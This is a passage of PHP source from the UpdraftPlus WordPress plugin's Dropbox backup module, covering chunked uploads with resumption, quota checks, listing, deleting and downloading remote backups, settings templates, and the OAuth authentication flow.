$chunk_size = $updraftplus->jobdata_get('dropbox_chunk_size', 1048576);
try {
$dropbox = $this->bootstrap();
if (false === $dropbox) throw new Exception(__('You are not authenticated with Dropbox', 'updraftplus'));
$this->log("access gained; setting chunk size to: ".round($chunk_size/1024, 1)." KB");
$dropbox->setChunkSize($chunk_size);
} catch (Exception $e) {
$this->log('error when trying to gain access: '.$e->getMessage().' (line: '.$e->getLine().', file: '.$e->getFile().')');
$this->log(sprintf(__('error: %s (see log file for more)', 'updraftplus'), $e->getMessage()), 'error');
return false;
}
$updraft_dir = $updraftplus->backups_dir_location();
foreach ($backup_array as $file) {
$available_quota = -1;
// If we experience any failures collecting account info, then carry on anyway
try {
/*
Quota information is no longer provided with account information a new call to quotaInfo must be made to get this information.
*/
$quota_info = $dropbox->quotaInfo();
// Access token expired try to refresh and then call quota info again
if ("401" == $quota_info['code']) {
$this->log('HTTP code 401 (unauthorized) code returned from Dropbox; attempting to refresh access token');
$dropbox->refreshAccessToken();
$quota_info = $dropbox->quotaInfo();
}
if ("200" != $quota_info['code']) {
$message = "account/info did not return HTTP 200; returned: ". $quota_info['code'];
} elseif (!isset($quota_info['body'])) {
$message = "account/info did not return the expected data";
} else {
$body = $quota_info['body'];
if (isset($body->quota_info)) {
$quota_info = $body->quota_info;
$total_quota = $quota_info->quota;
$normal_quota = $quota_info->normal;
$shared_quota = $quota_info->shared;
$available_quota = $total_quota - ($normal_quota + $shared_quota);
$message = "quota usage: normal=".round($normal_quota/1048576, 1)." MB, shared=".round($shared_quota/1048576, 1)." MB, total=".round($total_quota/1048576, 1)." MB, available=".round($available_quota/1048576, 1)." MB";
} else {
$total_quota = max($body->allocation->allocated, 1);
$used = $body->used;
/* check here to see if the account is a team account and if so use the other used value
This will give us their total usage including their individual account and team account */
if (isset($body->allocation->used)) $used = $body->allocation->used;
$available_quota = $total_quota - $used;
$message = "quota usage: used=".round($used/1048576, 1)." MB, total=".round($total_quota/1048576, 1)." MB, available=".round($available_quota/1048576, 1)." MB";
}
}
$this->log($message);
} catch (Exception $e) {
$this->log("exception (".get_class($e).") occurred whilst getting account info: ".$e->getMessage());
// $this->log(sprintf(__("%s error: %s", 'updraftplus'), 'Dropbox', $e->getMessage()).' ('.$e->getCode().')', 'warning', md5($e->getMessage()));
}
$file_success = 1;
$hash = md5($file);
$this->current_file_hash = $hash;
$filesize = filesize($updraft_dir.'/'.$file);
$this->current_file_size = $filesize;
// Into KB
$filesize = $filesize/1024;
$microtime = microtime(true);
if ('None' != ($upload_id = $this->jobdata_get('upload_id_'.$hash, 'None', 'updraf_dbid_'.$hash))) {
// Resume
$offset = $this->jobdata_get('upload_offset_'.$hash, 0, 'updraf_dbof_'.$hash);
if ($offset) $this->log("This is a resumption: $offset bytes had already been uploaded");
} else {
$offset = 0;
$upload_id = 'None';
}
// We don't actually abort now - there's no harm in letting it try and then fail
if (-1 != $available_quota && $available_quota < ($filesize-$offset)) {
$this->log("File upload expected to fail: file data remaining to upload ($file) size is ".($filesize-$offset)." b (overall file size; .".($filesize*1024)." b), whereas available quota is only $available_quota b");
// $this->log(sprintf(__("Account full: your %s account has only %d bytes left, but the file to be uploaded has %d bytes remaining (total size: %d bytes)",'updraftplus'),'Dropbox', $available_quota, $filesize-$offset, $filesize), 'warning');
}
$ufile = apply_filters('updraftplus_dropbox_modpath', $file, $this);
$this->log("Attempt to upload: $file to: $ufile");
$this->upload_tick = microtime(true);
$this->uploaded_offset = $offset;
try {
$response = $dropbox->chunkedUpload($updraft_dir.'/'.$file, '', $ufile, true, $offset, $upload_id, array($this, 'chunked_callback'));
if (empty($response['code']) || "200" != $response['code']) {
$this->log('Unexpected HTTP code returned from Dropbox: '.$response['code']." (".serialize($response).")");
if ($response['code'] >= 400) {
if (401 == $response['code']) {
$this->log('HTTP code 401 returned from Dropbox, refreshing access token');
$dropbox->refreshAccessToken();
}
$this->log(sprintf(__('error: failed to upload file to %s (see log file for more)', 'updraftplus'), $file), 'error');
$file_success = 0;
} else {
$this->log(__('did not return the expected response - check your log file for more details', 'updraftplus'), 'warning');
}
}
} catch (Exception $e) {
$this->log("chunked upload exception (".get_class($e)."): ".$e->getMessage().' (line: '.$e->getLine().', file: '.$e->getFile().')');
if (preg_match("/Submitted input out of alignment: got \[(\d+)\] expected \[(\d+)\]/i", $e->getMessage(), $matches)) {
// Try the indicated offset
$we_tried = $matches[1];
$dropbox_wanted = (int) $matches[2];
$this->log("not yet aligned: tried=$we_tried, wanted=$dropbox_wanted; will attempt recovery");
$this->uploaded_offset = $dropbox_wanted;
$upload_id = $this->jobdata_get('upload_id_'.$hash, 'None', 'updraf_dbid_'.$hash);
try {
$dropbox->chunkedUpload($updraft_dir.'/'.$file, '', $ufile, true, $dropbox_wanted, $upload_id, array($this, 'chunked_callback'));
} catch (Exception $e) {
$msg = $e->getMessage();
if (preg_match('/Upload with upload_id .* already completed/', $msg)) {
$this->log('returned an error, but apparently indicating previous success: '.$msg);
} else {
$this->log($msg.' (line: '.$e->getLine().', file: '.$e->getFile().')');
$this->log(sprintf(__('failed to upload file to %s (see log file for more)', 'updraftplus'), $ufile), 'error');
$file_success = 0;
if (strpos($msg, 'select/poll returned error') !== false && $this->upload_tick > 0 && time() - $this->upload_tick > 800) {
UpdraftPlus_Job_Scheduler::reschedule(60);
$this->log("Select/poll returned after a long time: scheduling a resumption and terminating for now");
UpdraftPlus_Job_Scheduler::record_still_alive();
die;
}
}
}
} else {
$msg = $e->getMessage();
if (preg_match('/Upload with upload_id .* already completed/', $msg)) {
$this->log('returned an error, but apparently indicating previous success: '.$msg);
} else {
$this->log(sprintf(__('failed to upload file to %s (see log file for more)', 'updraftplus'), $ufile), 'error');
$file_success = 0;
if (strpos($msg, 'select/poll returned error') !== false && $this->upload_tick > 0 && time() - $this->upload_tick > 800) {
UpdraftPlus_Job_Scheduler::reschedule(60);
$this->log("Select/poll returned after a long time: scheduling a resumption and terminating for now");
UpdraftPlus_Job_Scheduler::record_still_alive();
die;
}
}
}
}
if ($file_success) {
$updraftplus->uploaded_file($file);
$microtime_elapsed = microtime(true)-$microtime;
$speedps = ($microtime_elapsed > 0) ? $filesize/$microtime_elapsed : 0;
$speed = sprintf("%.2d", $filesize)." KB in ".sprintf("%.2d", $microtime_elapsed)."s (".sprintf("%.2d", $speedps)." KB/s)";
$this->log("File upload success (".$file."): $speed");
$this->jobdata_delete('upload_id_'.$hash, 'updraf_dbid_'.$hash);
$this->jobdata_delete('upload_offset_'.$hash, 'updraf_dbof_'.$hash);
}
}
return null;
}
/**
* This method gets a list of files from the remote storage that match the string passed in and returns an array of backups
*
* @param String $match a substring to require (tested via strpos() !== false)
* @return Array
*/
public function listfiles($match = 'backup_') {
$opts = $this->get_options();
if (empty($opts['tk_access_token'])) return new WP_Error('no_settings', __('No settings were found', 'updraftplus').' (dropbox)');
try {
$dropbox = $this->bootstrap();
} catch (Exception $e) {
$this->log('access error: '.$e->getMessage().' (line: '.$e->getLine().', file: '.$e->getFile().')');
return new WP_Error('access_error', $e->getMessage());
}
$searchpath = '/'.untrailingslashit(apply_filters('updraftplus_dropbox_modpath', '', $this));
try {
/* Some users could have a large amount of backups, the max search is 1000 entries we should continue to search until there are no more entries to bring back. */
$cursor = '';
$matches = array();
while (true) {
$search = $dropbox->search($match, $searchpath, 1000, $cursor);
if (empty($search['code']) || 200 != $search['code']) return new WP_Error('response_error', sprintf(__('%s returned an unexpected HTTP response: %s', 'updraftplus'), 'Dropbox', $search['code']), $search['body']);
if (empty($search['body'])) return array();
if (isset($search['body']->matches) && is_array($search['body']->matches)) {
$matches = array_merge($matches, $search['body']->matches);
} elseif (is_array($search['body'])) {
$matches = $search['body'];
} else {
break;
}
if (isset($search['body']->has_more) && true == $search['body']->has_more && isset($search['body']->cursor)) {
$cursor = $search['body']->cursor;
} else {
break;
}
}
} catch (Exception $e) {
$this->log($e->getMessage().' (line: '.$e->getLine().', file: '.$e->getFile().')');
// The most likely cause of a search_error is specifying a non-existent path, which should just result in an empty result set.
// return new WP_Error('search_error', $e->getMessage());
return array();
}
$results = array();
foreach ($matches as $item) {
$item = $item->metadata;
if (!is_object($item)) continue;
if (isset($item->metadata)) $item = $item->metadata; // 2/files/search_v2 has a slightly different output structure compared to 2/files/search model
if ((!isset($item->size) || $item->size > 0) && 'folder' != $item->{'.tag'} && !empty($item->path_display) && 0 === strpos($item->path_display, $searchpath)) {
$path = substr($item->path_display, strlen($searchpath));
if ('/' == substr($path, 0, 1)) $path = substr($path, 1);
// Ones in subfolders are not wanted
if (false !== strpos($path, '/')) continue;
$result = array('name' => $path);
if (!empty($item->size)) $result['size'] = $item->size;
$results[] = $result;
}
}
return $results;
}
/**
* Identification of Dropbox app
*
* @return Array
*/
private function defaults() {
return apply_filters('updraftplus_dropbox_defaults', array('Z3Q3ZmkwbnplNHA0Zzlx', 'bTY0bm9iNmY4eWhjODRt'));
}
/**
* Delete files from the service using the Dropbox API
*
* @param Array $files - array of filenames to delete
* @param Array $data - unused here
* @param Array $sizeinfo - unused here
* @return Boolean|String - either a boolean true or an error code string
*/
public function delete($files, $data = null, $sizeinfo = array()) {// phpcs:ignore VariableAnalysis.CodeAnalysis.VariableAnalysis.UnusedVariable -- $data and $sizeinfo unused
if (is_string($files)) $files = array($files);
$opts = $this->get_options();
if (empty($opts['tk_access_token'])) {
$this->log('You are not authenticated with Dropbox (3)');
$this->log(sprintf(__('You are not authenticated with %s (whilst deleting)', 'updraftplus'), 'Dropbox'), 'warning');
return 'authentication_fail';
}
try {
$dropbox = $this->bootstrap();
} catch (Exception $e) {
$this->log($e->getMessage().' (line: '.$e->getLine().', file: '.$e->getFile().')');
$this->log(sprintf(__('Failed to access %s when deleting (see log file for more)', 'updraftplus'), 'Dropbox'), 'warning');
return 'service_unavailable';
}
if (false === $dropbox) return false;
$any_failures = false;
foreach ($files as $file) {
$ufile = apply_filters('updraftplus_dropbox_modpath', $file, $this);
$this->log("request deletion: $ufile");
try {
$dropbox->delete($ufile);
$file_success = 1;
} catch (Exception $e) {
$this->log($e->getMessage().' (line: '.$e->getLine().', file: '.$e->getFile().')');
}
if (isset($file_success)) {
$this->log('deletion succeeded');
} else {
$this->log('deletion failed');
$any_failures = true;
}
}
return $any_failures ? 'file_delete_error' : true;
}
public function download($file) {
global $updraftplus;
$opts = $this->get_options();
if (empty($opts['tk_access_token'])) {
$this->log('You are not authenticated with Dropbox (4)');
$this->log(sprintf(__('You are not authenticated with %s', 'updraftplus'), 'Dropbox'), 'error');
return false;
}
try {
$dropbox = $this->bootstrap();
} catch (Exception $e) {
$this->log($e->getMessage().' (line: '.$e->getLine().', file: '.$e->getFile().')');
$this->log($e->getMessage().' (line: '.$e->getLine().', file: '.$e->getFile().')', 'error');
return false;
}
if (false === $dropbox) return false;
$remote_files = $this->listfiles($file);
foreach ($remote_files as $file_info) {
if ($file_info['name'] == $file) {
return $updraftplus->chunked_download($file, $this, $file_info['size'], apply_filters('updraftplus_dropbox_downloads_manually_break_up', false), null, 2*1048576);
}
}
$this->log("$file: file not found in listing of remote directory");
return false;
}
/**
* Callback used by by chunked downloading API
*
* @param String $file - the file (basename) to be downloaded
* @param Array $headers - supplied headers
* @param Mixed $data - pass-back from our call to the API (which we don't use)
* @param resource $fh - the local file handle
*
* @return String - the data downloaded
*/
public function chunked_download($file, $headers, $data, $fh) {// phpcs:ignore Generic.CodeAnalysis.UnusedFunctionParameter.Found -- Unused parameter is present because the caller from UpdraftPlus class uses 4 arguments.
$opts = $this->get_options();// phpcs:ignore VariableAnalysis.CodeAnalysis.VariableAnalysis.UnusedVariable -- filter use
$storage = $this->get_storage();
$try_the_other_one = false;// phpcs:ignore VariableAnalysis.CodeAnalysis.VariableAnalysis.UnusedVariable -- filter use
$ufile = apply_filters('updraftplus_dropbox_modpath', $file, $this);
$options = array();
if (!empty($headers)) $options['headers'] = $headers;
try {
$get = $storage->download($ufile, $fh, $options);
} catch (Exception $e) {
$this->log($e);
$this->log($e->getMessage(), 'error');
$get = false;
}
return $get;
}
/**
* Retrieve a list of template properties by taking all the persistent variables and methods of the parent class and combining them with the ones that are unique to this module, also the necessary HTML element attributes and texts which are also unique only to this backup module
* NOTE: Please sanitise all strings that are required to be shown as HTML content on the frontend side (i.e. wp_kses())
*
* @return Array an associative array keyed by names that describe themselves as they are
*/
public function get_template_properties() {
global $updraftplus, $updraftplus_admin;
$partial_templates = $this->get_partial_templates();
$properties = array(
'storage_image_url' => UPDRAFTPLUS_URL.'/images/dropbox-logo.png',
'storage_image_description' => sprintf(__('%s logo', 'updraftplus'), 'Dropbox'),
'curl_existence_label' => wp_kses($updraftplus_admin->curl_check($updraftplus->backup_methods[$this->get_id()], true, $this->get_id().' hidden-in-updraftcentral', false), $this->allowed_html_for_content_sanitisation()),
'app_authorisation_policy_label' => wp_kses(sprintf(__('Please read %s for use of our %s authorization app (none of your backup data is sent to us).', 'updraftplus'), '<a target="_blank" href="https://updraftplus.com/faqs/what-is-your-privacy-policy-for-the-use-of-your-dropbox-app/">'.__('this privacy policy', 'updraftplus').'</a>', 'Dropbox'), $this->allowed_html_for_content_sanitisation()),
'sub_folders_instruction_label1' => __('Need to use sub-folders?', 'updraftplus'),
'sub_folders_instruction_label2' => sprintf(__('Backups are saved in %s.', 'updraftplus'), 'apps/UpdraftPlus'),
'sub_folders_instruction_label3' => wp_kses(sprintf(__('If you backup several sites into the same Dropbox and want to organize with sub-folders, then %scheck out Premium%s', 'updraftplus'), '<a href="'.apply_filters("updraftplus_com_link", "https://updraftplus.com/shop/").'" target="_blank">', '</a>'), $this->allowed_html_for_content_sanitisation()),
'input_authenticate_with_label' => sprintf(__('Authenticate with %s', 'updraftplus'), __('Dropbox', 'updraftplus')),
'already_authenticated_label' => __('(You are already authenticated).', 'updraftplus'),
'authentication_link_text' => wp_kses(sprintf(__("<strong>After</strong> you have saved your settings (by clicking 'Save Changes' below), then come back here and follow this link to complete authentication with %s.", 'updraftplus'), $updraftplus->backup_methods[$this->get_id()]), $this->allowed_html_for_content_sanitisation()),
'deauthentication_link_text' => sprintf(__("Follow this link to remove these settings for %s.", 'updraftplus'), $updraftplus->backup_methods[$this->get_id()]),
'authentication_label' => __('Ensure you are logged into the correct account before continuing.', 'updraftplus'),
'authorised_redirect_uri_label' => __('You must add the following as the authorised redirect URI in your Dropbox console (under "API Settings") when asked', 'updraftplus'),
'input_app_key_label' => __('Your Dropbox App Key', 'updraftplus'),
'input_app_secret_label' => __('Your Dropbox App Secret', 'updraftplus'),
'partial_templates_contain_input_element' => isset($partial_templates['dropbox_additional_configuration_top']) && preg_match('/<input(?:>|[^>]+>)/i', $partial_templates['dropbox_additional_configuration_top']),
'deauthentication_nonce' => wp_create_nonce($this->get_id().'_deauth_nonce'),
);
return wp_parse_args(apply_filters('updraft_'.$this->get_id().'_template_properties', array()), wp_parse_args($properties, $this->get_persistent_variables_and_methods()));
}
/**
* Get the pre configuration template
*
* @return String - the template
*/
public function get_pre_configuration_template() {
?>
<tr class="{{get_template_css_classes false}} {{method_id}}_pre_config_container">
<td colspan="2">
<img alt="{{storage_image_description}}" src="{{storage_image_url}}">
<br>
<p>
{{{curl_existence_label}}}
</p>
<p>
{{{app_authorisation_policy_label}}}
</p>
</td>
</tr>
<?php
}
/**
* Get remote storage partial templates, the partial template is recognised by its name. To find out a name of partial template, look for the partial call syntax in the template, it's enclosed by double curly braces (i.e. {{> partial_template_name }})
*
* @return Array an associative array keyed by name of the partial templates
*/
public function get_partial_templates() {
$partial_templates = array();
ob_start();
?>
<tr class="{{get_template_css_classes true}}">
<td></td>
<td><strong>{{sub_folders_instruction_label1}}</strong> {{sub_folders_instruction_label2}} {{{sub_folders_instruction_label3}}}</td>
</tr>
<?php
$partial_templates['dropbox_additional_configuration_top'] = ob_get_clean();
return wp_parse_args(apply_filters('updraft_'.$this->get_id().'_partial_templates', $partial_templates), parent::get_partial_templates());
}
/**
* Get the configuration template
*
* @return String - the template, ready for substitutions to be carried out
*/
public function get_configuration_template() {
ob_start();
?>
{{#> dropbox_additional_configuration_top}}
{{/dropbox_additional_configuration_top}}
<tr class="{{get_template_css_classes true}}">
<th>{{input_authenticate_with_label}}:</th>
<td>
{{#if is_authenticated}}
<p>
<strong>{{already_authenticated_label}}</strong>
<a class="updraft_deauthlink" href="{{admin_page_url}}?action=updraftmethod-{{method_id}}-auth&page=updraftplus&updraftplus_{{method_id}}auth=deauth&nonce={{deauthentication_nonce}}&updraftplus_instance={{instance_id}}" data-instance_id="{{instance_id}}" data-remote_method="{{method_id}}">{{deauthentication_link_text}}</a>
</p>
{{/if}}
{{#if ownername_sentence}}
<br/>
{{ownername_sentence}}
{{/if}}
<p>
{{authentication_label}} <a class="updraft_authlink" href="{{admin_page_url}}?&action=updraftmethod-{{method_id}}-auth&page=updraftplus&updraftplus_{{method_id}}auth=doit&nonce={{storage_auth_nonce}}&updraftplus_instance={{instance_id}}" data-instance_id="{{instance_id}}" data-remote_method="{{method_id}}">{{{authentication_link_text}}}</a>
</p>
</td>
</tr>
{{!-- Legacy: only show this next setting to old users who had a setting stored --}}
{{#if old_user_settings}}
<tr class="{{get_template_css_classes true}}">
<th></th>
<td>
<p>{{authorised_redirect_uri_label}}: <kbd>{{admin_page_url}}?page=updraftplus&action=updraftmethod-dropbox-auth</kbd></p>
</td>
</tr>
<tr class="{{get_template_css_classes true}}">
<th>{{input_app_key_label}}:</th>
<td><input type="text" autocomplete="off" style="width:332px" id="{{get_template_input_attribute_value "id" "appkey"}}" name="{{get_template_input_attribute_value "name" "appkey"}}" value="{{appkey}}" /></td>
</tr>
<tr class="{{get_template_css_classes true}}">
<th>{{input_app_secret_label}}:</th>
<td><input type="text" style="width:332px" id="{{get_template_input_attribute_value "id" "secret"}}" name="{{get_template_input_attribute_value "name" "secret"}}" value="{{secret}}" /></td>
</tr>
{{else}}
{{#unless partial_templates_contain_input_element}}
{{!-- We need to make sure that it is not the case that the module has no settings whatsoever - this can result in the module being effectively invisible. --}}
<input type="hidden" id="{{get_template_input_attribute_value "id" "dummy-nosave"}}" name="{{get_template_input_attribute_value "name" "dummy-nosave"}}" value="0">
{{/unless}}
{{/if}}
<?php
return ob_get_clean();
}
/**
* Generates ownername with email
*
* @param array $opts
* @return String - Ownername with email
*/
private function generate_ownername_with_email($opts) {
$ownername_with_email = '';
if (!empty($opts['ownername'])) {
$ownername_with_email = $opts['ownername'];
}
if (!empty($opts['email'])) {
if (!empty($ownername_with_email)) {
$ownername_with_email = $ownername_with_email.' ('.$opts['email'].')';
} else {
$ownername_with_email = $opts['email'];
}
}
return $ownername_with_email;
}
/**
* Modifies handerbar template options
*
* @param array $opts
* @return Array - Modified handerbar template options
*/
public function transform_options_for_template($opts) {
if (!empty($opts['tk_access_token'])) {
$opts['ownername'] = empty($opts['ownername']) ? '' : $opts['ownername'];
$opts['email'] = empty($opts['email']) ? '' : $opts['email'];
$ownername_with_email = $this->generate_ownername_with_email($opts);
if ($ownername_with_email) {
$opts['ownername_sentence'] = sprintf(__("Account holder's name: %s.", 'updraftplus'), $ownername_with_email).' ';
}
$opts['is_authenticated'] = true;
}
$opts['old_user_settings'] = (!empty($opts['appkey']) || (defined('UPDRAFTPLUS_CUSTOM_DROPBOX_APP') && UPDRAFTPLUS_CUSTOM_DROPBOX_APP));
if ($opts['old_user_settings']) {
$opts['appkey'] = empty($opts['appkey']) ? '' : $opts['appkey'];
$opts['secret'] = empty($opts['secret']) ? '' : $opts['secret'];
}
$opts = apply_filters("updraftplus_options_dropbox_options", $opts);
return $opts;
}
/**
* Gives settings keys which values should not passed to handlebarsjs context.
* The settings stored in UD in the database sometimes also include internal information that it would be best not to send to the front-end (so that it can't be stolen by a man-in-the-middle attacker)
*
* @return Array - Settings array keys which should be filtered
*/
public function filter_frontend_settings_keys() {
return array(
'CSRF',
'code',
'ownername',
'tk_access_token',
);
}
/**
* Over-rides the parent to allow this method to output extra information about using the correct account for OAuth authentication
*
* @return [boolean] - return false so that no extra information is output
*/
public function output_account_warning() {
return true;
}
/**
* Handles various URL actions, as indicated by the updraftplus_dropboxauth URL parameter
*
* @return null
*/
public function action_auth() {
if (isset($_GET['updraftplus_dropboxauth'])) {
if ('doit' == $_GET['updraftplus_dropboxauth']) {
$this->action_authenticate_storage();
return;
} elseif ('deauth' == $_GET['updraftplus_dropboxauth']) {
$this->action_deauthenticate_storage();
return;
}
} elseif (isset($_REQUEST['state'])) {
if ('POST' == $_SERVER['REQUEST_METHOD']) {
$raw_state = urldecode($_POST['state']);
if (isset($_POST['code'])) $raw_code = urldecode($_POST['code']);
} else {
$raw_state = $_GET['state'];
if (isset($_GET['code'])) $raw_code = $_GET['code'];
}
if (!empty($raw_code)) $this->do_complete_authentication($raw_state, $raw_code);
}
try {
$this->auth_request();
} catch (Exception $e) {
$this->log(sprintf(__("%s error: %s", 'updraftplus'), sprintf(__("%s authentication", 'updraftplus'), 'Dropbox'), $e->getMessage()), 'error');
}
}
/**
* This function will complete the oAuth flow, if return_instead_of_echo is true then add the action to display the authed admin notice, otherwise echo this notice to page.
*
* @param string $raw_state - the state
* @param string $raw_code - the oauth code
* @param boolean $return_instead_of_echo - a boolean to indicate if we should return the result or echo it
*
* @return void|string - returns the authentication message if return_instead_of_echo is true
*/
public function do_complete_authentication($raw_state, $raw_code, $return_instead_of_echo = false) {
// Get the CSRF from setting and check it matches the one returned if it does no CSRF attack has happened
$opts = $this->get_options();
$csrf = $opts['CSRF'];
$state = stripslashes($raw_state);
// Check the state to see if an instance_id has been attached and if it has then extract the state
$parts = explode(':', $state);
$state = $parts[0];
if (strcmp($csrf, $state) == 0) {
$opts['CSRF'] = '';
if (isset($raw_code)) {
// set code so it can be accessed in the next authentication step
$opts['code'] = stripslashes($raw_code);
// remove our flag so we know this authentication is complete
if (isset($opts['auth_in_progress'])) unset($opts['auth_in_progress']);
$this->set_options($opts, true);
$auth_result = $this->auth_token($return_instead_of_echo);
if ($return_instead_of_echo) return $auth_result;
}
} else {
error_log("UpdraftPlus: CSRF comparison failure: $csrf != $state");
}
}
/**
* This method will reset any saved options and start the bootstrap process for an authentication
*
* @param String $instance_id - the instance id of the settings we want to authenticate
*/
public function do_authenticate_storage($instance_id) {
try {
// Clear out the existing credentials
$opts = $this->get_options();
$opts['tk_access_token'] = '';
unset($opts['tk_request_token']);
$opts['ownername'] = '';
// Set a flag so we know this authentication is in progress
$opts['auth_in_progress'] = true;
$this->set_options($opts, true);
$this->set_instance_id($instance_id);
$this->bootstrap(false);
} catch (Exception $e) {
$this->log(sprintf(__("%s error: %s", 'updraftplus'), sprintf(__("%s authentication", 'updraftplus'), 'Dropbox'), $e->getMessage()), 'error');
}
}
/**
* This method will start the bootstrap process for a de-authentication
*
* @param String $instance_id - the instance id of the settings we want to de-authenticate
*/
public function do_deauthenticate_storage($instance_id) {
try {
$this->set_instance_id($instance_id);
$this->bootstrap(true);
} catch (Exception $e) {
$this->log(sprintf(__("%s error: %s", 'updraftplus'), sprintf(__("%s de-authentication", 'updraftplus'), 'Dropbox'), $e->getMessage()), 'error');
}
}
/**
* This method will setup the authenticated admin warning, it can either return this or echo it
*
* @param boolean $return_instead_of_echo - a boolean to indicate if we should return the result or echo it
*
* @return void|string - returns the authentication message if return_instead_of_echo is true
*/
public function show_authed_admin_warning($return_instead_of_echo) {
global $updraftplus_admin;
$dropbox = $this->bootstrap();
if (false === $dropbox) return false;
try {
$account_info = $dropbox->accountInfo();
} catch (Exception $e) {
$accountinfo_err = sprintf(__("%s error: %s", 'updraftplus'), 'Dropbox', $e->getMessage()).' ('.$e->getCode().')';
}
$message = "<strong>".__('Success:', 'updraftplus').'</strong> '.sprintf(__('you have authenticated your %s account', 'updraftplus'), 'Dropbox');
// We log, because otherwise people get confused by the most recent log message of 'Parameter not found: oauth_token' and raise support requests
$this->log(__('Success:', 'updraftplus').' '.sprintf(__('you have authenticated your %s account', 'updraftplus'), 'Dropbox'));
if (empty($account_info['code']) || "200" != $account_info['code']) {
$message .= " (".__('though part of the returned information was not as expected - whether this indicates a real problem cannot be determined', 'updraftplus').") ". $account_info['code'];
if (!empty($accountinfo_err)) $message .= "<br>".htmlspecialchars($accountinfo_err);
} else {
$body = $account_info['body'];
$name = '';
$email = '';
if (isset($body->display_name)) {
$name = $body->display_name;
} else {
$name = $body->name->display_name;
}
if (isset($body->email)) {
$email = $body->email;
}
$opts = $this->get_options();
$opts['ownername'] = $name;
$opts['email'] = $email;
$ownername_with_email = $this->generate_ownername_with_email($opts);
$message .= ". <br>".sprintf(__('Your %s account name: %s', 'updraftplus'), 'Dropbox', htmlspecialchars($ownername_with_email));
$this->set_options($opts, true);
try {
/**
* Quota information is no longer provided with account information a new call to qoutaInfo must be made to get this information. The timeout is because we've seen cases where it returned after 180 seconds (apparently a faulty outgoing proxy), and we may as well wait as cause an error leading to user confusion.
*/
$quota_info = $dropbox->quotaInfo(array('timeout' => 190));
if (empty($quota_info['code']) || "200" != $quota_info['code']) {
$message .= " (".__('though part of the returned information was not as expected - whether this indicates a real problem cannot be determined', 'updraftplus').")". $quota_info['code'];
if (!empty($accountinfo_err)) $message .= "<br>".htmlspecialchars($accountinfo_err);
} else {
$body = $quota_info['body'];
if (isset($body->quota_info)) {
$quota_info = $body->quota_info;
$total_quota = max($quota_info->quota, 1);
$normal_quota = $quota_info->normal;
$shared_quota = $quota_info->shared;
$available_quota =$total_quota - ($normal_quota + $shared_quota);
$used_perc = round(($normal_quota + $shared_quota)*100/$total_quota, 1);
$message .= ' <br>'.sprintf(__('Your %s quota usage: %s %% used, %s available', 'updraftplus'), 'Dropbox', $used_perc, round($available_quota/1048576, 1).' MB');
} else {
$total_quota = max($body->allocation->allocated, 1);
$used = $body->used;
/* check here to see if the account is a team account and if so use the other used value
This will give us their total usage including their individual account and team account */
if (isset($body->allocation->used)) $used = $body->allocation->used;
$available_quota =$total_quota - $used;
$used_perc = round($used*100/$total_quota, 1);
$message .= ' <br>'.sprintf(__('Your %s quota usage: %s %% used, %s available', 'updraftplus'), 'Dropbox', $used_perc, round($available_quota/1048576, 1).' MB');
}
}
} catch (Exception $e) {
// Catch
}
}
if ($return_instead_of_echo) {
return "<div class='updraftmessage updated'><p>{$message}</p></div>";
} else {
$updraftplus_admin->show_admin_warning($message);
}
}
/**
* Bootstrap and check token, can also return the authentication method if return_instead_of_echo is true
*
* @param boolean $return_instead_of_echo - a boolean to indicate if we should return the result or echo it
*
* @return void|string - returns the authentication message if return_instead_of_echo is true
*/
public function auth_token($return_instead_of_echo) {
$this->bootstrap();
$opts = $this->get_options();
if (!empty($opts['tk_access_token'])) {
if ($return_instead_of_echo) {
return $this->show_authed_admin_warning($return_instead_of_echo);
} else {
add_action('all_admin_notices', array($this, 'show_authed_admin_warning'));
}
}
}
/**
* Acquire single-use authorization code
*/
public function auth_request() {
$this->bootstrap();
}
/**
* This basically reproduces the relevant bits of bootstrap.php from the SDK
*
* @param Boolean $deauthenticate indicates if we should bootstrap for a deauth or auth request
* @return object
*/
public function bootstrap($deauthenticate = false) {
$storage = $this->get_storage();
if (!empty($storage) && !is_wp_error($storage)) return $storage;
// Dropbox APIv1 is dead, but we'll keep the variable in case v3 is ever announced
$dropbox_api = 'Dropbox2';
updraft_try_include_file('includes/'.$dropbox_api.'/API.php', 'include_once');
updraft_try_include_file('includes/'.$dropbox_api.'/Exception.php', 'include_once');
updraft_try_include_file('includes/'.$dropbox_api.'/OAuth/Consumer/ConsumerAbstract.php', 'include_once');
updraft_try_include_file('includes/'.$dropbox_api.'/OAuth/Storage/StorageInterface.php', 'include_once');
updraft_try_include_file('includes/'.$dropbox_api.'/OAuth/Storage/Encrypter.php', 'include_once');
updraft_try_include_file('includes/'.$dropbox_api.'/OAuth/Storage/WordPress.php', 'include_once');
updraft_try_include_file('includes/'.$dropbox_api.'/OAuth/Consumer/Curl.php', 'include_once');
// updraft_try_include_file('includes/'.$dropbox_api.'/OAuth/Consumer/WordPress.php', 'require_once');
$opts = $this->get_options();
$key = empty($opts['secret']) ? '' : $opts['secret'];
$sec = empty($opts['appkey']) ? '' : $opts['appkey'];
$oauth2_id = defined('UPDRAFTPLUS_DROPBOX_CLIENT_ID') ? UPDRAFTPLUS_DROPBOX_CLIENT_ID : base64_decode('dzQxM3o0cWhqejY1Nm5l');
// Set the callback URL
$callbackhome = UpdraftPlus_Options::admin_page_url().'?page=updraftplus&action=updraftmethod-dropbox-auth';
$callback = defined('UPDRAFTPLUS_DROPBOX_AUTH_RETURN_URL') ? UPDRAFTPLUS_DROPBOX_AUTH_RETURN_URL : 'https://auth.updraftplus.com/auth/dropbox/';
if (defined('UPDRAFTPLUS_CUSTOM_DROPBOX_APP') && UPDRAFTPLUS_CUSTOM_DROPBOX_APP) $callback = $callbackhome;
$instance_id = $this->get_instance_id();
// Instantiate the Encryptor and storage objects
$encrypter = new Dropbox_Encrypter('ThisOneDoesNotMatterBeyondLength');
// Instantiate the storage
$dropbox_storage = new Dropbox_WordPress($encrypter, "tk_", 'updraft_dropbox', $this);
// WordPress consumer does not yet work
// $oauth = new Dropbox_ConsumerWordPress($sec, $key, $dropbox_storage, $callback);
// Get the DropBox API access details
list($d2, $d1) = $this->defaults();
if (empty($sec)) {
$sec = base64_decode($d1);
}
if (empty($key)) {
$key = base64_decode($d2);
}
$root = 'sandbox';
if ('dropbox:' == substr($sec, 0, 8)) {
$sec = substr($sec, 8);
$root = 'dropbox';
}
try {
$oauth = new Dropbox_Curl($sec, $oauth2_id, $key, $dropbox_storage, $callback, $callbackhome, $deauthenticate, $instance_id);
} catch (Exception $e) {
$this->log("Curl error: ".$e->getMessage());
